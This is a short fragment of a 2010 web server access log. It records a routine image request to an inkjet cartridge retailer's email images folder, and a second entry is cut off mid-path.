67.78.19.162 - - [02/Mar/2010:16:52:43 -0800] "GET /email/images/inkmail21_05.gif HTTP/1.1" 200 15725 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; WinNT-PAI 11.06.2009; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
91.209.105.137 - - [02/Mar/2010:16:53:36 -0800] "GET /lo